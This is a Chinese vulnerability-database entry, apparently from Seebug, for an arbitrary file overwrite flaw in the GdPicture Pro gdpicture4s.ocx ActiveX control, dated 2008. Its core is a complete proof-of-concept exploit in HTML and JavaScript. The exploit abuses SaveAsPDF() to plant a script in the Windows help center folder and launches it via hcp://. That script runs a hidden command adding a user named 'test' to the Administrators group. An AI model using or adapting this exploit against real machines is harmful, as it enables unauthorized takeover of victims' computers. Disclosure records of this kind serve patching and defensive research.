GdPicture Pro 'gdpicture4s.ocx' ActiveX控件任意文件覆盖漏洞

基本字段

漏洞编号：: SSV-4161

披露/发现时间：: 未知

提交时间：: 2008-10-07

漏洞等级：

漏洞类别：: 远程溢出

影响组件：: (4.7.1)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.35KB

&lt;!-- --------------------------------------------------------------------------------- GdPicture Pro ActiveX (gdpicture4s.ocx) Remote File Overwrite / Execution Exploit --------------------------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.gdpicture.com/ ProgID...: GdPicture4S.Imaging Description: SaveAsPDF() method allow to create / overwrite file through sFilePath argument. By using other arguments, such as sTitle, an attacker could be inject html code and execute it using the hcp:// protocol (tecnique discovered by rgod). Also GdPicturePro5.Imaging is prone to this vulnerability, but it doesn&#039;t implements the IObjectSafety interface. Tested on Windows XP SP2 with IE 6/7 Object safety report: Report for Clsid: {E8512363-3581-42EF-A43D-990E7935C8BE} RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data [*] A special thanks goes to shinnai, for his patience :) --&gt; &lt;object classid=&#039;clsid:E8512363-3581-42EF-A43D-990E7935C8BE&#039; id=&#039;test&#039;&gt;&lt;/object&gt; &lt;script language=&#039;javascript&#039;&gt; var cmd = &quot;cmd /c net user test test /add &amp; net localgroup Administrators test /add&quot;; var outFile = &quot;c:\\windows\\pchealth\\helpctr\\system\\errors\\badurl.htm&quot;; var BMP = &quot;\x42\x4d\x42\x00\x00\x00\x00\x00\x00\x00\x3e&quot; + &quot;\x00\x00\x00\x28\x00\x00\x00\x01\x00\x00\x00&quot; + &quot;\x01\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00&quot; + &quot;\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00&quot; + &quot;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&quot; + &quot;\x00\x00\x00\xff\xff\xff\x00\x80\x00\x00\x00&quot;; var sc = &quot;&lt;object classid=&#039;clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8&#039; id=&#039;wsh&#039;&gt;&lt;\/object&gt;&quot; + &quot;&lt;script language=&#039;vbscript&#039;&gt;wsh.Run \&quot;&quot; + cmd + &quot;\&quot;, SW_HIDE&lt;\/script&gt;&quot;; test.SetLicenseNumber(&quot;0317955669879948884162456&quot;); // only to avoid the nag screen test.CreateImageFromString(BMP); if (test.SaveAsPDF(outFile, sc, &quot;&quot;, &quot;&quot;, &quot;&quot;)) location.href = &quot;hcp://system/errors/badurl.htm&quot;; &lt;/script&gt;

共 1 兑换

参考链接

http://www.securityfocus.com/bid/31504

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC

生命线

发现/披露了漏洞
2008-10-07 提交了漏洞
2008-10-07 提交补充了漏洞详情
2008-10-07 提交更新了 PoC

GdPicture Pro 'gdpicture4s.ocx' ActiveX控件任意文件覆盖漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

GdPicture Pro 'gdpicture4s.ocx' ActiveX控件任意文件覆盖漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定